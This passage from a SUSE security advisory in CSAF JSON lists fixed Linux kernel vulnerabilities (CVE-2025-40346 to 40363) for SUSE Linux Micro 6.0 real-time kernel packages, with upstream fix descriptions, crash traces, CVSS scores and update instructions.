"text": "In the Linux kernel, the following vulnerability has been resolved:\n\narch_topology: Fix incorrect error check in topology_parse_cpu_capacity()\n\nFix incorrect use of PTR_ERR_OR_ZERO() in topology_parse_cpu_capacity()\nwhich causes the code to proceed with NULL clock pointers. The current\nlogic uses !PTR_ERR_OR_ZERO(cpu_clk) which evaluates to true for both\nvalid pointers and NULL, leading to potential NULL pointer dereference\nin clk_get_rate().\n\nPer include/linux/err.h documentation, PTR_ERR_OR_ZERO(ptr) returns:\n\"The error code within @ptr if it is an error pointer; 0 otherwise.\"\n\nThis means PTR_ERR_OR_ZERO() returns 0 for both valid pointers AND NULL\npointers. Therefore !PTR_ERR_OR_ZERO(cpu_clk) evaluates to true (proceed)\nwhen cpu_clk is either valid or NULL, causing clk_get_rate(NULL) to be\ncalled when of_clk_get() returns NULL.\n\nReplace with !IS_ERR_OR_NULL(cpu_clk) which only proceeds for valid\npointers, preventing potential NULL pointer dereference in clk_get_rate().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40346",
"url": "https://www.suse.com/security/cve/CVE-2025-40346"
},
{
"category": "external",
"summary": "SUSE Bug 1255318 for CVE-2025-40346",
"url": "https://bugzilla.suse.com/1255318"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40346"
},
{
"cve": "CVE-2025-40347",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40347"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: enetc: fix the deadlock of enetc_mdio_lock\n\nAfter applying the workaround for err050089, the LS1028A platform\nexperiences RCU stalls on RT kernel. This issue is caused by the\nrecursive acquisition of the read lock enetc_mdio_lock. Here list some\nof the call stacks identified under the enetc_poll path that may lead to\na deadlock:\n\nenetc_poll\n -\u003e enetc_lock_mdio\n -\u003e enetc_clean_rx_ring OR napi_complete_done\n -\u003e napi_gro_receive\n -\u003e enetc_start_xmit\n -\u003e enetc_lock_mdio\n -\u003e enetc_map_tx_buffs\n -\u003e enetc_unlock_mdio\n -\u003e enetc_unlock_mdio\n\nAfter enetc_poll acquires the read lock, a higher-priority writer attempts\nto acquire the lock, causing preemption. The writer detects that a\nread lock is already held and is scheduled out. However, readers under\nenetc_poll cannot acquire the read lock again because a writer is already\nwaiting, leading to a thread hang.\n\nCurrently, the deadlock is avoided by adjusting enetc_lock_mdio to prevent\nrecursive lock acquisition.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40347",
"url": "https://www.suse.com/security/cve/CVE-2025-40347"
},
{
"category": "external",
"summary": "SUSE Bug 1255262 for CVE-2025-40347",
"url": "https://bugzilla.suse.com/1255262"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40347"
},
{
"cve": "CVE-2025-40349",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40349"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfs: validate record offset in hfsplus_bmap_alloc\n\nhfsplus_bmap_alloc can trigger a crash if a\nrecord offset or length is larger than node_size\n\n[ 15.264282] BUG: KASAN: slab-out-of-bounds in hfsplus_bmap_alloc+0x887/0x8b0\n[ 15.265192] Read of size 8 at addr ffff8881085ca188 by task test/183\n[ 15.265949]\n[ 15.266163] CPU: 0 UID: 0 PID: 183 Comm: test Not tainted 6.17.0-rc2-gc17b750b3ad9 #14 PREEMPT(voluntary)\n[ 15.266165] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 15.266167] Call Trace:\n[ 15.266168] \u003cTASK\u003e\n[ 15.266169] dump_stack_lvl+0x53/0x70\n[ 15.266173] print_report+0xd0/0x660\n[ 15.266181] kasan_report+0xce/0x100\n[ 15.266185] hfsplus_bmap_alloc+0x887/0x8b0\n[ 15.266208] hfs_btree_inc_height.isra.0+0xd5/0x7c0\n[ 15.266217] hfsplus_brec_insert+0x870/0xb00\n[ 15.266222] __hfsplus_ext_write_extent+0x428/0x570\n[ 15.266225] __hfsplus_ext_cache_extent+0x5e/0x910\n[ 15.266227] hfsplus_ext_read_extent+0x1b2/0x200\n[ 15.266233] hfsplus_file_extend+0x5a7/0x1000\n[ 15.266237] hfsplus_get_block+0x12b/0x8c0\n[ 15.266238] __block_write_begin_int+0x36b/0x12c0\n[ 15.266251] block_write_begin+0x77/0x110\n[ 15.266252] cont_write_begin+0x428/0x720\n[ 15.266259] hfsplus_write_begin+0x51/0x100\n[ 15.266262] cont_write_begin+0x272/0x720\n[ 15.266270] hfsplus_write_begin+0x51/0x100\n[ 15.266274] generic_perform_write+0x321/0x750\n[ 15.266285] generic_file_write_iter+0xc3/0x310\n[ 15.266289] __kernel_write_iter+0x2fd/0x800\n[ 15.266296] dump_user_range+0x2ea/0x910\n[ 15.266301] elf_core_dump+0x2a94/0x2ed0\n[ 15.266320] vfs_coredump+0x1d85/0x45e0\n[ 15.266349] get_signal+0x12e3/0x1990\n[ 15.266357] arch_do_signal_or_restart+0x89/0x580\n[ 15.266362] irqentry_exit_to_user_mode+0xab/0x110\n[ 15.266364] asm_exc_page_fault+0x26/0x30\n[ 15.266366] RIP: 0033:0x41bd35\n[ 15.266367] Code: bc d1 f3 0f 7f 27 f3 0f 7f 6f 10 f3 0f 7f 77 20 f3 0f 7f 7f 30 49 83 c0 0f 49 29 d0 48 8d 7c 17 31 e9 9f 0b 00 00 66 0f ef c0 \u003cf3\u003e 0f 6f 0e f3 0f 6f 56 10 66 0f 74 c1 66 0f d7 d0 49 83 f8f\n[ 15.266369] RSP: 002b:00007ffc9e62d078 EFLAGS: 00010283\n[ 15.266371] RAX: 00007ffc9e62d100 RBX: 0000000000000000 RCX: 0000000000000000\n[ 15.266372] RDX: 00000000000000e0 RSI: 0000000000000000 RDI: 00007ffc9e62d100\n[ 15.266373] RBP: 0000400000000040 R08: 00000000000000e0 R09: 0000000000000000\n[ 15.266374] R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000\n[ 15.266375] R13: 0000000000000000 R14: 0000000000000000 R15: 0000400000000000\n[ 15.266376] \u003c/TASK\u003e\n\nWhen calling hfsplus_bmap_alloc to allocate a free node, this function\nfirst retrieves the bitmap from header node and map node using node-\u003epage\ntogether with the offset and length from hfs_brec_lenoff\n\n```\nlen = hfs_brec_lenoff(node, 2, \u0026off16);\noff = off16;\n\noff += node-\u003epage_offset;\npagep = node-\u003epage + (off \u003e\u003e PAGE_SHIFT);\ndata = kmap_local_page(*pagep);\n```\n\nHowever, if the retrieved offset or length is invalid(i.e. exceeds\nnode_size), the code may end up accessing pages outside the allocated\nrange for this node.\n\nThis patch adds proper validation of both offset and length before use,\npreventing out-of-bounds page access. Move is_bnode_offset_valid and\ncheck_and_correct_requested_length to hfsplus_fs.h, as they may be\nrequired by other functions.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40349",
"url": "https://www.suse.com/security/cve/CVE-2025-40349"
},
{
"category": "external",
"summary": "SUSE Bug 1255280 for CVE-2025-40349",
"url": "https://bugzilla.suse.com/1255280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40349"
},
{
"cve": "CVE-2025-40350",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40350"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/mlx5e: RX, Fix generating skb from non-linear xdp_buff for striding RQ\n\nXDP programs can change the layout of an xdp_buff through\nbpf_xdp_adjust_tail() and bpf_xdp_adjust_head(). Therefore, the driver\ncannot assume the size of the linear data area nor fragments. Fix the\nbug in mlx5 by generating skb according to xdp_buff after XDP programs\nrun.\n\nCurrently, when handling multi-buf XDP, the mlx5 driver assumes the\nlayout of an xdp_buff to be unchanged. That is, the linear data area\ncontinues to be empty and fragments remain the same. This may cause\nthe driver to generate erroneous skb or triggering a kernel\nwarning. When an XDP program added linear data through\nbpf_xdp_adjust_head(), the linear data will be ignored as\nmlx5e_build_linear_skb() builds an skb without linear data and then\npull data from fragments to fill the linear data area. When an XDP\nprogram has shrunk the non-linear data through bpf_xdp_adjust_tail(),\nthe delta passed to __pskb_pull_tail() may exceed the actual nonlinear\ndata size and trigger the BUG_ON in it.\n\nTo fix the issue, first record the original number of fragments. If the\nnumber of fragments changes after the XDP program runs, rewind the end\nfragment pointer by the difference and recalculate the truesize. Then,\nbuild the skb with the linear data area matching the xdp_buff. Finally,\nonly pull data in if there is non-linear data and fill the linear part\nup to 256 bytes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40350",
"url": "https://www.suse.com/security/cve/CVE-2025-40350"
},
{
"category": "external",
"summary": "SUSE Bug 1255260 for CVE-2025-40350",
"url": "https://bugzilla.suse.com/1255260"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40350"
},
{
"cve": "CVE-2025-40351",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40351"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nhfsplus: fix KMSAN uninit-value issue in hfsplus_delete_cat()\n\nThe syzbot reported issue in hfsplus_delete_cat():\n\n[ 70.682285][ T9333] =====================================================\n[ 70.682943][ T9333] BUG: KMSAN: uninit-value in hfsplus_subfolders_dec+0x1d7/0x220\n[ 70.683640][ T9333] hfsplus_subfolders_dec+0x1d7/0x220\n[ 70.684141][ T9333] hfsplus_delete_cat+0x105d/0x12b0\n[ 70.684621][ T9333] hfsplus_rmdir+0x13d/0x310\n[ 70.685048][ T9333] vfs_rmdir+0x5ba/0x810\n[ 70.685447][ T9333] do_rmdir+0x964/0xea0\n[ 70.685833][ T9333] __x64_sys_rmdir+0x71/0xb0\n[ 70.686260][ T9333] x64_sys_call+0xcd8/0x3cf0\n[ 70.686695][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.687119][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.687646][ T9333]\n[ 70.687856][ T9333] Uninit was stored to memory at:\n[ 70.688311][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0\n[ 70.688779][ T9333] hfsplus_create_cat+0x148e/0x1800\n[ 70.689231][ T9333] hfsplus_mknod+0x27f/0x600\n[ 70.689730][ T9333] hfsplus_mkdir+0x5a/0x70\n[ 70.690146][ T9333] vfs_mkdir+0x483/0x7a0\n[ 70.690545][ T9333] do_mkdirat+0x3f2/0xd30\n[ 70.690944][ T9333] __x64_sys_mkdir+0x9a/0xf0\n[ 70.691380][ T9333] x64_sys_call+0x2f89/0x3cf0\n[ 70.691816][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.692229][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.692773][ T9333]\n[ 70.692990][ T9333] Uninit was stored to memory at:\n[ 70.693469][ T9333] hfsplus_subfolders_inc+0x1c2/0x1d0\n[ 70.693960][ T9333] hfsplus_create_cat+0x148e/0x1800\n[ 70.694438][ T9333] hfsplus_fill_super+0x21c1/0x2700\n[ 70.694911][ T9333] mount_bdev+0x37b/0x530\n[ 70.695320][ T9333] hfsplus_mount+0x4d/0x60\n[ 70.695729][ T9333] legacy_get_tree+0x113/0x2c0\n[ 70.696167][ T9333] vfs_get_tree+0xb3/0x5c0\n[ 70.696588][ T9333] do_new_mount+0x73e/0x1630\n[ 70.697013][ T9333] path_mount+0x6e3/0x1eb0\n[ 70.697425][ T9333] __se_sys_mount+0x733/0x830\n[ 70.697857][ T9333] __x64_sys_mount+0xe4/0x150\n[ 70.698269][ T9333] x64_sys_call+0x2691/0x3cf0\n[ 70.698704][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.699117][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.699730][ T9333]\n[ 70.699946][ T9333] Uninit was created at:\n[ 70.700378][ T9333] __alloc_pages_noprof+0x714/0xe60\n[ 70.700843][ T9333] alloc_pages_mpol_noprof+0x2a2/0x9b0\n[ 70.701331][ T9333] alloc_pages_noprof+0xf8/0x1f0\n[ 70.701774][ T9333] allocate_slab+0x30e/0x1390\n[ 70.702194][ T9333] ___slab_alloc+0x1049/0x33a0\n[ 70.702635][ T9333] kmem_cache_alloc_lru_noprof+0x5ce/0xb20\n[ 70.703153][ T9333] hfsplus_alloc_inode+0x5a/0xd0\n[ 70.703598][ T9333] alloc_inode+0x82/0x490\n[ 70.703984][ T9333] iget_locked+0x22e/0x1320\n[ 70.704428][ T9333] hfsplus_iget+0x5c/0xba0\n[ 70.704827][ T9333] hfsplus_btree_open+0x135/0x1dd0\n[ 70.705291][ T9333] hfsplus_fill_super+0x1132/0x2700\n[ 70.705776][ T9333] mount_bdev+0x37b/0x530\n[ 70.706171][ T9333] hfsplus_mount+0x4d/0x60\n[ 70.706579][ T9333] legacy_get_tree+0x113/0x2c0\n[ 70.707019][ T9333] vfs_get_tree+0xb3/0x5c0\n[ 70.707444][ T9333] do_new_mount+0x73e/0x1630\n[ 70.707865][ T9333] path_mount+0x6e3/0x1eb0\n[ 70.708270][ T9333] __se_sys_mount+0x733/0x830\n[ 70.708711][ T9333] __x64_sys_mount+0xe4/0x150\n[ 70.709158][ T9333] x64_sys_call+0x2691/0x3cf0\n[ 70.709630][ T9333] do_syscall_64+0xd9/0x1d0\n[ 70.710053][ T9333] entry_SYSCALL_64_after_hwframe+0x77/0x7f\n[ 70.710611][ T9333]\n[ 70.710842][ T9333] CPU: 3 UID: 0 PID: 9333 Comm: repro Not tainted 6.12.0-rc6-dirty #17\n[ 70.711568][ T9333] Hardware name: QEMU Ubuntu 24.04 PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014\n[ 70.712490][ T9333] =====================================================\n[ 70.713085][ T9333] Disabling lock debugging due to kernel taint\n[ 70.713618][ T9333] Kernel panic - not syncing: kmsan.panic set ...\n[ 70.714159][ T9333] \n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40351",
"url": "https://www.suse.com/security/cve/CVE-2025-40351"
},
{
"category": "external",
"summary": "SUSE Bug 1255281 for CVE-2025-40351",
"url": "https://bugzilla.suse.com/1255281"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40351"
},
{
"cve": "CVE-2025-40355",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40355"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysfs: check visibility before changing group attribute ownership\n\nSince commit 0c17270f9b92 (\"net: sysfs: Implement is_visible for\nphys_(port_id, port_name, switch_id)\"), __dev_change_net_namespace() can\nhit WARN_ON() when trying to change owner of a file that isn\u0027t visible.\nSee the trace below:\n\n WARNING: CPU: 6 PID: 2938 at net/core/dev.c:12410 __dev_change_net_namespace+0xb89/0xc30\n CPU: 6 UID: 0 PID: 2938 Comm: incusd Not tainted 6.17.1-1-mainline #1 PREEMPT(full) 4b783b4a638669fb644857f484487d17cb45ed1f\n Hardware name: Framework Laptop 13 (AMD Ryzen 7040Series)/FRANMDCP07, BIOS 03.07 02/19/2025\n RIP: 0010:__dev_change_net_namespace+0xb89/0xc30\n [...]\n Call Trace:\n \u003cTASK\u003e\n ? if6_seq_show+0x30/0x50\n do_setlink.isra.0+0xc7/0x1270\n ? __nla_validate_parse+0x5c/0xcc0\n ? security_capable+0x94/0x1a0\n rtnl_newlink+0x858/0xc20\n ? update_curr+0x8e/0x1c0\n ? update_entity_lag+0x71/0x80\n ? sched_balance_newidle+0x358/0x450\n ? psi_task_switch+0x113/0x2a0\n ? __pfx_rtnl_newlink+0x10/0x10\n rtnetlink_rcv_msg+0x346/0x3e0\n ? sched_clock+0x10/0x30\n ? __pfx_rtnetlink_rcv_msg+0x10/0x10\n netlink_rcv_skb+0x59/0x110\n netlink_unicast+0x285/0x3c0\n ? __alloc_skb+0xdb/0x1a0\n netlink_sendmsg+0x20d/0x430\n ____sys_sendmsg+0x39f/0x3d0\n ? import_iovec+0x2f/0x40\n ___sys_sendmsg+0x99/0xe0\n __sys_sendmsg+0x8a/0xf0\n do_syscall_64+0x81/0x970\n ? __sys_bind+0xe3/0x110\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? sock_alloc_file+0x63/0xc0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? alloc_fd+0x12e/0x190\n ? put_unused_fd+0x2a/0x70\n ? do_sys_openat2+0xa2/0xe0\n ? syscall_exit_work+0x143/0x1b0\n ? do_syscall_64+0x244/0x970\n ? exc_page_fault+0x7e/0x1a0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n [...]\n \u003c/TASK\u003e\n\nFix this by checking is_visible() before trying to touch the attribute.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40355",
"url": "https://www.suse.com/security/cve/CVE-2025-40355"
},
{
"category": "external",
"summary": "SUSE Bug 1255261 for CVE-2025-40355",
"url": "https://bugzilla.suse.com/1255261"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40355"
},
{
"cve": "CVE-2025-40360",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40360"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/sysfb: Do not dereference NULL pointer in plane reset\n\nThe plane state in __drm_gem_reset_shadow_plane() can be NULL. Do not\nderef that pointer, but forward NULL to the other plane-reset helpers.\nClears plane-\u003estate to NULL.\n\nv2:\n- fix typo in commit description (Javier)",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40360",
"url": "https://www.suse.com/security/cve/CVE-2025-40360"
},
{
"category": "external",
"summary": "SUSE Bug 1255095 for CVE-2025-40360",
"url": "https://bugzilla.suse.com/1255095"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2025-40360"
},
{
"cve": "CVE-2025-40363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: ipv6: fix field-spanning memcpy warning in AH output\n\nFix field-spanning memcpy warnings in ah6_output() and\nah6_output_done() where extension headers are copied to/from IPv6\naddress fields, triggering fortify-string warnings about writes beyond\nthe 16-byte address fields.\n\n memcpy: detected field-spanning write (size 40) of single field \"\u0026top_iph-\u003esaddr\" at net/ipv6/ah6.c:439 (size 16)\n WARNING: CPU: 0 PID: 8838 at net/ipv6/ah6.c:439 ah6_output+0xe7e/0x14e0 net/ipv6/ah6.c:439\n\nThe warnings are false positives as the extension headers are\nintentionally placed after the IPv6 header in memory. Fix by properly\ncopying addresses and extension headers separately, and introduce\nhelper functions to avoid code duplication.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
